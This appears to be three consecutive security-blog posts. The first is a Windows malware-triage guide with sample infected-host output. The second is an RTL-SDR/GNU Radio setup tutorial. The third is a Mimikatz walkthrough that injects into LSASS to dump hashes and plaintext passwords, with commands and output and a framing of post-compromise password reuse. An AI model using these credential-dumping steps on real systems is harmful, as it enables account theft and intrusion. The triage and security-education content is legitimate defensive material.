cports /stext cportsoutput.txt

Sample Output
C:\>cports /stext cportsoutput.txt

-snip-
==================================================
Process Name : wracing.exe
Process ID : 1680
Protocol : TCP
Local Port : 1750
Local Port Name :
Local Address : 192.168.200.53
Remote Port : 443
Remote Port Name : https
Remote Address : 63.232.79.43
Remote Host Name :
State : Established
Process Path : C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe
Product Name :
-snip-

Examine Common File Locations


In terms of examining file locations, there may not be many tools better than the good old native "dir" command. The following command has been natively present in Windows since before the dawn of time; however, the options may not be well known to you or your family members. Running the "dir" command with the following syntax will produce a listing that is sorted by the file creation time.

System32


Many files are located here and thus this is a common place for malware to hide among the weeds.

dir /o:d /t:c c:\windows\system32 >> output.txt

Sample Output
C:\>dir /o:d /t:c c:\windows\system32
-snip-
01/07/2010 05:48 PM 689,152 xpsp3res.dll
01/07/2010 06:02 PM <dir> en
01/07/2010 06:02 PM <dir> scripting
01/07/2010 06:02 PM <dir> en-us
01/07/2010 06:19 PM 1,676,288 xpssvcs.dll
01/07/2010 06:19 PM 575,488 xpsshhdr.dll
01/07/2010 06:19 PM 117,760 prntvpt.dll
01/07/2010 06:20 PM <dir> XPSViewer
01/07/2010 06:34 PM 2,560 xpsp4res.dll
01/07/2010 07:39 PM 25,966,024 MRT.exe
01/07/2010 07:50 PM 3,706 TZLog.log
2009 File(s) 408,261,849 bytes
52 Dir(s) 2,505,060,352 bytes free

User’s home directory


This is a popular spot for malware to hide because the attacker has permission to write to these locations under the context of the user.

dir /a /s /o:d /t:c "%USERPROFILE%" >> output.txt

Sample Output
dir /a /s /o:d /t:c "%USERPROFILE%"

-SNIP-
Directory of C:\Documents and Settings\Administrator\Local Settings\Temp
01/07/2010 07:00 PM 54,272 Set29F.tmp
01/07/2010 07:42 PM <dir> NDP1.1sp1-KB953297-X86
01/07/2010 07:47 PM 14,010 ASPNETSetup_00002.log
09/13/2010 09:24 PM 8,141 lick_me.jpg
09/13/2010 09:24 PM 37,376 wracing.exe
09/13/2010 09:24 PM 28,160 wracing.dll
09/13/2010 09:28 PM <dir> plugtmp
03/23/2012 01:43 PM <dir> VMwareDnD
03/23/2012 02:54 PM 104 pdracing.tmp
-SNIP-

Note: The filenames above are from real malware--we did not make those up.

Investigating Persistence


Malware wants to survive a reboot, and the way this is accomplished is called a “Persistence Mechanism”. Sometimes the persistence mechanism can give away the presence of malicious software on a system. The following persistence mechanisms will be examined:
  • Services
  • Registry
  • Scheduled Tasks
  • Startup Directory

Examine Services


Examining services will leverage both native and non-native tools for analysis. The following command has been natively present in Windows for ages. This command is commonly used to list the started services.

net start >> output.txt

Sample Output
C:\>net start
These Windows services are started:

Application Layer Gateway Service
Automatic Updates
COM+ Event System
Computer Browser
Cryptographic Services
DCOM Server Process Launcher
DHCP Client
Distributed Link Tracking Client
DNS Client
Event Log
FTP Publishing
Help and Support
IIS Admin
IPSEC Services
Logical Disk Manager
MSSQLSERVER
Network Connections
Network Location Awareness (NLA)
Plug and Play
Protected Storage
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Registry
Secondary Logon
Security Accounts Manager
Security Center
Server
Shell Hardware Detection
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper
Telephony
Terminal Services
VMware Tools Service
WebClient
Windows Firewall/Internet Connection Sharing (ICS)
Windows Management Instrumentation
Windows Time
Workstation
World Wide Web Publishing

The command completed successfully.


The command below, using psservice (discussed in a moment), could also be used; however, it is not as concise as "net start":
psservice query -s start


You will see sample output from this very useful tool in a bit.

The following command has been natively present in Windows since XP and 2003. It will list the process name, process ID (PID), and the keyname for the service.

tasklist /svc >> output.txt


Sample Output
C:\>tasklist /svc

Image Name PID Services
========================= ====== ============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 604 N/A
csrss.exe 652 N/A
winlogon.exe 676 N/A
services.exe 720 Eventlog, PlugPlay
lsass.exe 732 PolicyAgent, ProtectedStorage, SamSs
svchost.exe 892 DcomLaunch, TermService
svchost.exe 960 RpcSs
svchost.exe 1072 Browser, CryptSvc, Dhcp, dmserver,
EventSystem, helpsvc, lanmanserver,
lanmanworkstation, Netman, Nla, RasMan,
Schedule, seclogon, SENS, SharedAccess,
ShellHWDetection, TapiSrv, TrkWks, W32Time,
winmgmt, wscsvc, wuauserv
svchost.exe 1132 Dnscache
svchost.exe 1272 LmHosts, RemoteRegistry
explorer.exe 1408 N/A
VMwareUser.exe 1648 N/A
ctfmon.exe 1660 N/A
wracing.exe 1680 N/A
sqlmangr.exe 1692 N/A
svchost.exe 1808 WebClient
inetinfo.exe 1864 IISADMIN, MSFtpsvc, W3SVC
sqlservr.exe 1880 MSSQLSERVER
VMwareService.exe 128 VMTools
alg.exe 1168 ALG
cmd.exe 1928 N/A
firefox.exe 380 N/A
notepad.exe 1344 N/A
tasklist.exe 1820 N/A
wmiprvse.exe 1892 N/A

psservice.exe is another non-native tool from Mark Russinovich (of sysinternals--now Microsoft) and can be found at http://technet.microsoft.com/en-us/sysinternals/bb897542. It can be used to function like the "sc" command--however, the advantage of this tool compared to sc is that it can be run remotely using credentials other than the current user. Additionally, it easily provides the binary path and description with one query shown below:

psservice config [service name] >> output.txt

Sample Output
C:\>psservice config webclient

PsService v2.24 - Service information and configuration utility
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

SERVICE_NAME: WebClient
DISPLAY_NAME: WebClient
Enables Windows-based programs to create, access, and modify Internet-based files. If this service is stopped, these fun
ctions will not be available. If this service is disabled, any services that explicitly depend on it will fail to start.

TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINDOWS\System32\svchost.exe -k LocalService
LOAD_ORDER_GROUP : NetworkProvider
TAG : 0
DEPENDENCIES : MRxDAV
SERVICE_START_NAME: NT AUTHORITY\LocalService

If you would like to get all of the services, descriptions, and full paths to the binaries, omit the service name at the end. For example:
psservice config
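
As noted above, an advantage of psservice over sc is that it can be pointed at a remote host with alternate credentials. A sketch of the remote form, following the usual PsTools syntax (the hostname and account below are placeholders; omitting -p should cause the tool to prompt for the password):

psservice \\TARGETHOST -u DOMAIN\someuser config webclient >> output.txt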

Examine Registry Entries and the Startup Directory


In the prior article we used two native Windows binaries to investigate this data, the reg command and dir command. In this article everything can be achieved with one tool--autorunsc. This is another tool from Mark Russinovich (of sysinternals--now Microsoft). It can be downloaded at http://technet.microsoft.com/en-us/sysinternals/bb963902.

autorunsc -l >> output.txt

Sample Output
C:\>autorunsc -l

Sysinternals Autoruns v10.06 - Autostart program viewer
Copyright (C) 2002-2010 Mark Russinovich and Bryce Cogswell
Sysinternals - www.sysinternals.com

-snip-

C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
putbginfo.bat.lnk
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\putbginfo.bat.lnk
File not found: C:\TOOLS\bginfo\putbginfo.bat


HKCU\Software\Microsoft\Windows\CurrentVersion\Run
ctfmon.exe
C:\WINDOWS\system32\ctfmon.exe
CTF Loader
Microsoft Corporation
5.1.2600.5512
c:\windows\system32\ctfmon.exe
5f1d5f88303d4a4dbc8e5f97ba967cc3 (MD5)
99cb7370f16773c8e2d0c86fe805ec638ab126e9 (SHA-1)
5fb24fc7916a6e6b3be7d84cb1684215b266cd1495575c2e5672b8447932e5b1 (SHA-256)
wracing
C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe -installkys
c:\documents and settings\administrator\local settings\temp\wracing.exe
862cac1ffae3ca515f1c8588e3c3c394 (MD5)
fb38ac1459da93f36be0af0999618a2f643e2fc8 (SHA-1)
ede018f2be5f4655d71c0b02db394b4ff332aacc508915de47bcaf2c1db0cc78 (SHA-256)
-snip-

With this sample output, we see that “wracing.exe” is in the “C:\Documents and Settings\Administrator\Local Settings\Temp” directory. We suggest you review the file listing of this directory, sorted by file creation time as well to see what other artifacts may be present from the same timeframe.

Malware will often modify the system security settings contained within the Registry to make removal and remediation more difficult such as disabling the firewall or antivirus and other critical system security alerting mechanisms.

The Windows Security Center settings are common targets for malware infections. They control whether you are notified if something happens to your antivirus, firewall, Windows updates, etc. With a value of "0" the "disable" setting is off – the notification feature is still active and you will be warned if your antivirus or firewall is disabled. With a value of "1" the "disable" setting is on, and the affected item will no longer be reported in the Windows Security Center as an item of concern if it is disabled.

To review the Registry run:
regedit

Common items which are disabled by malware include entries similar to those found below:

HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center
FirstRunDisabled REG_DWORD 0x1
AntiVirusDisableNotify REG_DWORD 0x0
FirewallDisableNotify REG_DWORD 0x0
UpdatesDisableNotify REG_DWORD 0x0
AntiVirusOverride REG_DWORD 0x0
FirewallOverride REG_DWORD 0x0

If these registry values are set to "1", then the corresponding notification is disabled.
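
If you would rather avoid the regedit GUI, the same values can be pulled from the command line with the native reg tool (the key is the one discussed above):

reg query "HKLM\SOFTWARE\Microsoft\Security Center" >> output.txt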

Examine Scheduled Tasks


In the prior article we used two native Windows binaries to investigate this data, the at command and schtasks command. In this article everything can be achieved with one tool--autorunsc. This is the same tool used above to check the registry entries and startup directory. It can be downloaded at http://technet.microsoft.com/en-us/sysinternals/bb963902.

autorunsc -t >> output.txt

Sample Output
C:\Documents and Settings\Administrator>autorunsc -t

Sysinternals Autoruns v11.21 - Autostart program viewer
Copyright (C) 2002-2012 Mark Russinovich and Bryce Cogswell
Sysinternals - www.sysinternals.com

Task Scheduler
ezyme.job
C:\WINDOWS\system32\csript.exe //E:javascript C:\WINDOWS\TEMP\ezmye.zbz
C:\Windows\temp\ezmye.zbz
aa186d30801500ca22b83c17d42ea743 (MD5)
304b5e0352b846cce0b5403392a7c49e55f60ad1 (SHA-1)
-snip-

This output is far superior to that of at or schtasks because it provides the full path to the binary, the arguments, as well as MD5 and SHA-1 hashes! Wow.
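
If you need a non-technical relative to run everything in one shot, the commands covered in this post can be dropped into a simple batch file. A hypothetical sketch (it assumes the non-native tools above sit in the current directory or in PATH, and it only strings together commands already shown):

@echo off
REM triage.bat - collect the output of the tools discussed above into one file
set OUT=%COMPUTERNAME%_triage.txt
pslist >> %OUT%
pslist -t >> %OUT%
cmdline >> %OUT%
cports /stext cports_%COMPUTERNAME%.txt
net start >> %OUT%
tasklist /svc >> %OUT%
psservice config >> %OUT%
autorunsc -l >> %OUT%
autorunsc -t >> %OUT%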

Initial Analysis of the Results


Analysis often takes far longer than the time required to run the commands. However, according to the sample information above, it appears that we have at least two infections on this host. The data below ties everything together.

Malicious software is present in the process list here:

Name                Pid Pri Thd  Hnd   Priv        CPU Time    Elapsed Time
wracing 1680 8 1 19 324 0:00:41.609 4:05:23.687

and here:
C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe [1680]
"C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe"

It also has a connection out to a known bad site:

Process Name      : wracing.exe
Process ID : 1680
Remote Port : 443
Remote Port Name : https
Remote Address : 63.232.79.43
Process Path : C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe

Malicious files are present in the following directory:

C:\Documents and Settings\Administrator\Local Settings\Temp

09/13/2010 09:24 PM 8,141 lick_me.jpg
09/13/2010 09:24 PM 37,376 wracing.exe
09/13/2010 09:24 PM 28,160 wracing.dll

The persistence mechanism is via the registry:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
wracing
C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe -installkys
c:\documents and settings\administrator\local settings\temp\wracing.exe
862cac1ffae3ca515f1c8588e3c3c394 (MD5)
fb38ac1459da93f36be0af0999618a2f643e2fc8 (SHA-1)
ede018f2be5f4655d71c0b02db394b4ff332aacc508915de47bcaf2c1db0cc78 (SHA-256)
-snip-

There is also a second (most likely unrelated) suspicious task that runs via the scheduler:

Task Scheduler
ezyme.job
C:\WINDOWS\system32\csript.exe //E:javascript C:\WINDOWS\TEMP\ezmye.zbz
C:\Windows\temp\ezmye.zbz
aa186d30801500ca22b83c17d42ea743 (MD5)
304b5e0352b846cce0b5403392a7c49e55f60ad1 (SHA-1)
-snip-16:33:00, 3/23/2012

Recovery


Fortunately antivirus programs protect us from most of the threats that are out there, however the bad guys are constantly finding new ways to infect our systems with new malware. Once your system is infected, the only way to be 1000% certain you have found all of the components of the malware is to re-image your system. (Don’t just re-format the hard disk, as some malware such as TDSS is now infecting the disk boot records)

If you decide to go the route of manual cleanup, here are some helpful thoughts to speed you on your journey:

  • If you find your system is infected by the malware, the first thing you want to do is disconnect your system from the internet as quickly as possible to prevent additional malware from being placed on your system and to limit the potential data loss.
  • Make a backup. Note that some malware will also infect any USB device which is plugged in. This means that inserting a USB hard drive to perform a backup may actually infect it with an active infection component.
  • Turn off System Restore. If the malware infected any of the critical operating system areas, the system restore points may contain copies of the infection which you can inadvertently restore to operation if you recover your OS from an infected copy.
    • My Computer -> Properties -> click the System Restore tab -> Click to select the Turn off System Restore check box
  • Using a known clean system, change all your passwords. A common target for malware is credentials, which can then be used by the bad guys to access your accounts, perform fraudulent activities, etc.
  • Install the latest updated antivirus and anti-spyware software and scan your system to clean the malware or spyware; be sure to configure the software to prompt you prior to taking action on any suspicious files found.
  • Reboot your system, update all the antivirus signatures, and rescan your system with the antivirus and anti-spyware software.
  • If your system is still affected by the malware, then a running process may be infected. To solve this issue you need to boot from a live CD such as BartPE (http://www.nu2.nu/pebuilder/) to prevent the process from running. Tools such as HijackThis can be used to clean the system while the process is not running in order to remove the infection.


Food for Thought


If the infection is using rootkit technology, there is a better chance that either the native or non-native Windows tools will reveal that something is amiss--especially if the non-native tool uses non-Windows API calls to gather the information. If nothing shows up as indicators of compromise, but relatives are still convinced they are owned--they may have a healthy dose of paranoia. Either way, they may have to take it in to a shop or wait until the next holiday gathering when you have your fingers on the keyboard for a more in-depth analysis. As always, happy hunting!

Getting Started with GNU Radio and RTL-SDR (on Backtrack)

By Brad Antoniewicz.

In this blog post I'll aim to get you at least partially familiar with Software Defined Radio and the Realtek RTL2832U chipset, and provide Backtrack 5 R2 setup and usage instructions so that you can easily get off to a good start.

Software Defined Radio


In the last few years, Software Defined Radio (SDR) has been drawing a lot of attention from radio enthusiasts and hackers alike. This is because SDRs move much of the signal processing from hardware into software. This provides incredible flexibility. For instance, normally, with your standard 2.4GHz 802.11 adapter, your use cases are relatively limited: transmitting and monitoring 802.11 traffic on the 2.4GHz spectrum. However with an SDR, since the processing is not locked into the firmware of the adapter, you have greater capabilities: you're only limited by the frequency spectrum the card supports (within 2.4GHz) and not the protocol. So you could then transmit and monitor anything that exists within the 2.4GHz spectrum such as cordless phones, bluetooth devices, microwave ovens, car alarms, video devices, ZigBee (the list goes on and on), and of course, 802.11.

GNU Radio



GNU Radio is the development toolkit that handles the signal processing from the SDR hardware (or from a file containing signaling information). This is essentially the work horse of SDR. Unfortunately, GNU Radio has a bad reputation for being not so well documented and a bit bloated. That's OK though; whether you agree or not, you cannot deny that its maintainers are doing really amazing work. In my opinion, if you don't like the documentation, then it's up to you to write good guides so that people can utilize this great work.

Hardware


Obviously a big component of SDR is the hardware. Although there are a number of different platforms out there, we'll discuss the USRP and ones utilizing the RTL2832U chipset (since it's the topic of this blog post).

USRP



The Universal Software Radio Peripheral (USRP) by Ettus Research (who must be raking in the dough, based on their new website) is, and pretty much has been, the de facto hardware component of SDR for the last 5 years (probably more). The USRP is modular and can support just about any radio frequency spectrum.

The USRP's main problem is that it's really expensive. The main component ranges from $650 - $1700, and then you need daughter boards for the specific frequency spectrum you want to play with, which are $74-$450 each. Then there are antennas, cables, and other accessories. Sure, you could always use the open source schematics to build your own, but seriously, who the heck is going to do that? In a community that is known for being creative with costs, the USRP really builds a wall between the classes. Sucks.

Realtek RTL2832U



It was recently discovered that a number of manufacturers have released digital TV USB capture devices that leverage the Realtek RTL2832U chipset. The chipset was created with the intention of doing DVB-T (digital TV) and COFDM (radio) demodulation for these adapters; however, a curious radio enthusiast named Antti Palosaari discovered that:

These $20 adapters are actually SDRs!

As you can imagine, this discovery sparked a whole lot of interest. Soon the Osmocom OsmoSDR team built the necessary software to interact with the chipset and called it RTL-SDR. Additionally, RTL-SDR fans started documenting all of their experiences on the /r/RTLSDR/ subreddit page. People began doing everything they could with their brand new, super cheap RTL-SDRs.


Supported Frequencies

One of the major downsides to the RTL2832U is that it supports only 64 – 1700 MHz (at most). This means we're somewhat confined to the technologies we can play with. That being said, it's really nothing to complain about because there are a ton of things within that frequency spectrum (and for $20, complaining is not allowed)!


Supported Adapters

It's pretty crucial that when choosing what DVB-T dongles you buy, you first consult the various compatibility lists out there to ensure the adapter you're looking at actually has an RTL2832U chipset and works well. Here are a couple to consult:

Where to buy
The one shown in the picture is mine, which was actually gifted to me (Thanks Steve!), bought at Deal Extreme (a.k.a. the shadiest site I buy from on the internet). It's the "DVB-T TV Receiver Realtek RTL2832U Elonics E4000 Radio P335", and can also be found on eBay for $18.88 (free shipping).

There's a list of adapters and where to buy them at:

Configuration


The Windows RTL-SDR setup and configuration is pretty well documented in a variety of places online. I like to use Linux for most of my tinkering, so this guide will focus specifically on setting things up and using Backtrack 5 R2. If you're using MacOSX, you're kind of screwed - RTL-SDR requires GNU Radio >= v3.5.3, macports doesn't have it pre-built for you, and compiling from source is super painful and requires a lot of manual code edits to get things working. Stick with a BT5R2 or Windows Virtual Machine until someone actually gets a macports package out.

Making sure your adapter is registered


Before doing anything, make sure you have the adapter plugged in and it's detected by the system.
 root@bt:~# lsusb | grep -i RTL  
Bus 001 Device 008: ID 0bda:2832 Realtek Semiconductor Corp. RTL2832U DVB-T


Manual Labor


The people over at hack4fun wrote up an article about how to build everything from scratch. If you'd like to, that's a good guide to get you up and running to a certain point, but the truth is, you don't need to do that much work. There are a couple of scripts and other things that will accomplish the exact same thing (build from source) with much less typing.

The build-gnuradio script


Marcus Leech wrote a really simple-to-use script called build-gnuradio. This works great, but needs a handful of modifications in order to work on Backtrack. The main changes are to remove the sudo checks since Backtrack runs as root. I also added a patch for gr-smartnet to work a little better. An obviously more secure alternative would be to create a non-root user and run the script, but since I always use Backtrack in a non-persistent mode, that isn't a major concern of mine.

My modified version of the build-gnuradio script (called build-gnuradio-bt) can be downloaded here:

Note: At the time of this writing the author of gr-smartnet just started to resume work on the project. There's a possibility that by the time you read this, he'll have figured out a way around the above gnuradio patch.

The way the script works is that it checks for a packages directory (included in the bundle described in the "The really easy way" section below), and if it doesn't find it, it defaults to the standard build-gnuradio script functionality and downloads all the required sources, compiles them, and installs. During the gnuradio build it will look for a "patches/gnuradio_gri_wav-v0.1.patch" file that patches gnuradio to work with gr-smartnet. If it can't find the patch, it'll just continue on and compile. To run the script, make sure you have internet access and type:
root@bt:~# wget https://raw.github.com/brad-anton/gnuradio/master/build-gnuradio-bt
root@bt:~# mkdir patches
root@bt:~# cd patches
root@bt:~# wget https://raw.github.com/brad-anton/gnuradio/master/gnuradio_gri_wav-v0.1.patch
root@bt:~# cd ..
root@bt:~# chmod +x build-gnuradio-bt
root@bt:~# ./build-gnuradio-bt


It will take some time to run so be patient. If you're using non-persistent Backtrack or don't want to wait a long time for everything to compile, check out the next section, it's much faster.

The really easy way


Since I use non-persistent Backtrack a lot and often don't have internet access when I do so, I built everything from scratch then created packages for all of the components.

The downside of this way is that you'll have to download a 290MB file that contains all the packages, but once that's done, it's smooth sailing from there.

You can download the bundle (gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2) here:

Integrity Checks:
md5sum gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2
a603351e08318a963ee850c69acfcbb8 gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2

sha1sum gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2
66eeb8eaace16f2af73b7d77be3c035fa2359f81 gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2


I just copy the bundle to the root of my BT5R2 USB stick, then once it's booted, just:

root@bt:~# tar -jxf /cdrom/gnuradio_rtl-sdr_bt5r2_bundle_v0.1.tar.bz2 
root@bt:~# cd gnuradio_rtl-sdr_bt5r2_bundle_v0.1/
root@bt:~/gnuradio_rtl-sdr_bt5r2_bundle_v0.1# ./build-gnuradio-bt


The script will ask you to proceed and you should see output similar to this:
[+] Offline install -> Installing gnuradio + supporting libraries
[+] Removing potentially conflicting packages
[+] Installing precompiled binaries from /root/gnuradio_rtl-sdr_bt5r2_bundle_v0.1/packages
[+] Wrapping up install
[+] Copying util to ~/rtl_sdr-utils
[+] Offline installation Completed! Enjoy!


Then you can rm the directory to free up disk space:
root@bt:~/gnuradio_rtl-sdr_bt5r2_bundle_v0.1# cd ..
root@bt:~# rm -rf gnuradio_rtl-sdr_bt5r2_bundle_v0.1/


Using RTL-SDR


Once you have it all installed, a simple test to make sure the adapter is getting recognized is to use the rtl_test utility to run a quick benchmark. Your output should be similar:

root@bt:~# rtl_test -t
Found 1 device(s):
0: Generic RTL2832U (e.g. hama nano)

Using device 0: Generic RTL2832U (e.g. hama nano)
Found Elonics E4000 tuner
Supported gain values (18): -1.0 1.5 4.0 6.5 9.0 11.5 14.0 16.5 19.0 21.5 24.0 29.0 34.0 42.0 43.0 45.0 47.0 49.0
Benchmarking E4000 PLL...
[E4K] PLL not locked for 51000000 Hz!
[E4K] PLL not locked for 2219000000 Hz!
[E4K] PLL not locked for 1109000000 Hz!
[E4K] PLL not locked for 1237000000 Hz!
E4K range: 52 to 2218 MHz
E4K L-band gap: 1109 to 1237 MHz
root@bt:~#


Multimode.py

Marcus Leech created a tool called Multimode that acts as a multi-mode receiver for a variety of modes such as FM, AM, SSB, WFM, and TV-FM. This is the perfect tool to start playing with SDR.

Installation

If you used the easy way above, then multimode is already installed; if not, you'll need to install it yourself.
root@bt:~# svn co https://www.cgran.org/svn/projects/multimode
A multimode/trunk
A multimode/trunk/multimode_helper.py
A multimode/trunk/multimode.py
A multimode/trunk/COPYING
A multimode/trunk/multimode.grc
A multimode/trunk/Makefile
A multimode/trunk/README
Checked out revision 996.
root@bt:~# cd multimode/trunk/
root@bt:~/multimode/trunk# make install
mkdir -p /root/bin
cp multimode.py multimode_helper.py /root/bin
Please make sure your PYTHONPATH includes /root/bin
And also that PATH includes /root/bin
this will allow multimode to work correctly
root@bt:~/multimode/trunk# export PYTHONPATH=$PYTHONPATH:/root/bin
root@bt:~/multimode/trunk# export PATH=$PATH:/root/bin

Interface


If you launch multimode with no options:
root@bt:~/bin# ./multimode.py 

It will listen on 150MHz FM. Make sure you have your speakers turned on and volume up. Remember, multimode is decoding the over-the-air signals and playing them back for your enjoyment; no sound = no fun. Obviously if nothing is transmitting in your area on 150MHz then you'll need to change it.

The interface can become a little sluggish and sometimes unresponsive on slower machines, so be patient. It is broken up into three main parts:
  1. Controls (Top)
  2. Spectrograph (Middle)
  3. Panorama (Bottom)



The guys at hack4fun cut out the spectrograph in the version they use on their site, because the panorama was getting cut off by the bottom of the screen.

Listening to FM Radio!


The local [crappy] radio station here in NYC is Z100, or more specifically 100.3FM. To leverage multimode.py to access it, just launch it with the following attributes:
root@bt:~/bin# ./multimode.py --freq 100.3M --dmode=WFM

And you should be able to hear the radio station playing!

Need the weather forecast? Check out 162.550MHz:

root@bt:~/bin# ./multimode.py --freq 162.550M

Listening to Local Law Enforcement!


Law enforcement is another great thing to listen to. Since everything is so close together in NYC, you can pick up almost all precincts, so let's see what's going on with the 17th! It's non-trunked and operating at 476.58750MHz, so let's key that into multimode:
root@bt:~/bin# ./multimode.py --freq 476.587M --ftune=5k

And if you keep an eye on the Spectrograph, you can see if there is activity on neighboring frequencies (precincts).



Other Notable Fun!


The GNURadio community is massive and there are a ton of people writing great code to leverage SDR's capabilities. Here's a short list of things that may appeal to our audience:

For more applications written for GNU Radio (specifically RTL-SDR) see:

Using the GNU Radio Companion


One of the most powerful components of GNU Radio is the GNU Radio Companion (GRC). It allows you to graphically program GNU Radio applications!

Creating a Spectrum Analyzer


Probably the simplest application to write using GRC is a spectrum analyzer. Since this is just meant as a quick introduction, we'll create a very stripped down spectrum analyzer to demonstrate some of the power of GRC.

Launching GRC

Launching GRC will require you to be running X, then just run:
root@bt:~# gnuradio-companion
A new window should open up--this is your development environment!

The GRC interface is split into three panes:
  1. The development area (Main Area/Left pane): This is where you'll create your flow graph
  2. Logging pane (Lower): Provides logging and debugging messages
  3. Block (Right pane): Lists the different development blocks that will make up your flow graph and application

Creating a Signal Flow Graph


Since GNU Radio can accept input from a variety of sources, the first thing we'll want to define is the actual source for our application. Since we've been using RTL-SDR, let's pick that.

Under "Sources" select "RTL2832 Source" from the Block pane and drag it into the development area.

Note: According to the comments below, it makes more sense to use the OsmoSDR source, since it's the official and latest greatest!


Next, we'll need to define something to do with our source. Since we want to create a spectrum analyzer, the "FFT sink" block is just what we need as it will show us what the spectrum looks like. We'll use the one under "WX GUI" to leverage wxPython.

Under "WX GUI Widgets" select "WX GUI FFT Sink from the block pane and drag it into the development area.



We'll have to also connect our Source to the FFT Sink. Click once on "Out" on the Source block then click "In" on the FFT Sink block. This will take the output from our RTL2832 and send it to the FFT sink.



You'll notice that the title of the source block (RTL2832 Source) and an attribute within the block (Frequency) are both highlighted red. This indicates a potential error: Frequency is a required attribute and it is undefined. Let's fix that.

Double click the source block and set a frequency. Here we'll define that of our radio station (100.3MHz), which in Hz translates to 100300000. The E notation of that is 1003e5.



That's all there is to it! Now generate everything by going to "Build" -> "Generate" (or by pressing the generate button). You should be prompted to save first, so here I'll just save it to /root/simple_test.grc:



Then run it by going to "Build" -> "Execute" (or by pressing the execute button). A new window should open up showing the signal in real time:



Depending on the power of your system, the window may be a little unresponsive or sluggish. We don't really need a throttle (a block between the source and the FFT sink) but if we add one, it'll fix that a bit.

If you check the "Average" you can clean up the signal:



The "Peak" checkbox will draw a line on the peaks, which can be useful if the signal is rapidly changing and you're trying to get an idea of what frequencies are being transmitted on:



If you wanted to always have the "Average" and "Peak" checked, you can modify the FFT Sink in the original drawing and set the two to "On":



To share your flows with other people, just send them your .grc (/root/simple_test.grc). You'll notice another file was created in the same directory, /root/simple_test.py. This is the Python source file for your application. If you didn't want to run GRC, you can launch the application independently:

root@bt:~ # ./simple_test.py


Want to learn more? Just yesterday (seriously, GNURadio is freaking exploding because of RTL-SDR), balint256 put together a group of GNU Radio tutorials that will take you to the next level! Check them out here!

Got tips for GNU Radio or RTL-SDR? See something I got wrong above? Speak up in the comments below!!



Using Mimikatz to Dump Passwords!

By Tony Lee.

If you haven't been paying attention, Mimikatz is a slick tool that pulls plain-text passwords out of WDigest (explained below) interfaced through LSASS. There are a few other blogs describing mimikatz on the net, but this will hopefully provide more details about the components involved and ideas on how to use it. The tool itself and the download page are in French, so it makes it “fun” to use if you don’t speak French :)

Download

Mimikatz can be downloaded from:

A couple of things to take into consideration:
  1. The tool has 32-bit and 64-bit versions – make sure you pick the correct version (systeminfo is your friend; a quick check is shown after this list)
  2. You need to run it as admin (need debug privs)
  3. Needs a DLL called sekurlsa.dll in order to inject into lsass.exe and dump the hashes in clear text (important to know, especially for remote dumping)
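
Regarding item 1, a quick way to check the target's architecture with native tools (the exact wording of the field can vary slightly between Windows versions):

systeminfo | findstr /B /C:"System Type"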

Use Cases


The key feature of this tool that sets it apart from other tools is its ability to pull plain-text passwords from the system instead of just password hashes. If your intention is to stay within the Windows environment and pass the hash, this may not be that big of a deal. However, if you are exploring the curious case of password reuse across different environments—the plain-text password can be quite useful. For example, you have compromised a “Good for Enterprise” server that has a web interface which is not tied into AD single sign on. It might be useful to have the Good admin’s plain-text password to try against the Good for Enterprise web interface. Additionally, unless you have significant computational power, you may not crack an NTLM password hash—thus pulling the plain-text proves useful once again.

What the heck is WDigest?


WDigest is a DLL first added in Windows XP that is used to authenticate users against HTTP Digest authentication and Simple Authentication and Security Layer (SASL) exchanges. Both of these require the user’s plain-text password in order to derive the key to authenticate—thus why it is stored in plain-text.


Source: http://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx

Running mimikatz


To run mimikatz you'll need mimikatz.exe and sekurlsa.dll on the system you're targeting. Once you launch mimikatz.exe from the command line you'll be provided with an interactive prompt that will allow you to perform a number of different commands. In the next sections we'll go over the following commands:

  • privilege::debug
  • inject::process lsass.exe sekurlsa.dll
  • @getLogonPasswords


Running locally (Windows 2008 R2 – 64-bit)


To enter the interactive mimikatz command prompt, just launch the executable:
mimikatz.exe


You'll be presented with a banner and a prompt:
C:\Users\Administrator\Desktop\mimikatz_trunk\x64>mimikatz.exe
mimikatz 1.0 x64 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:49:24) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz #



Next, we'll need to enable debug mode with the privilege::debug command:
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz #


Then we'll need to inject sekurlsa.dll into LSASS by using the inject::process command:
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 448
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz #


Finally, we'll pull any available login passwords using the @getLogonPasswords macro:
mimikatz # @getLogonPasswords

Authentification Id : 0;126660
Package d'authentification : NTLM
Utilisateur principal : Administrator
Domaine d'authentification : FS
msv1_0 : lm{ f67ce55ac831223dc187b8085fe1d9df }, ntlm{ 161cff084477fe596a5db81874498a24 }
wdigest : 1qaz@WSX
tspkg : 1qaz@WSX

--SNIP--

mimikatz # exit
Fermeture du canal de communication




You should see one entry for each user. Note the msv1_0 and wdigest fields. The former contains the LM and NTLM hashes for the Administrator user (defined by "Utilisateur principal") and the latter contains the WDigest entry, which is the plain-text password of the user!

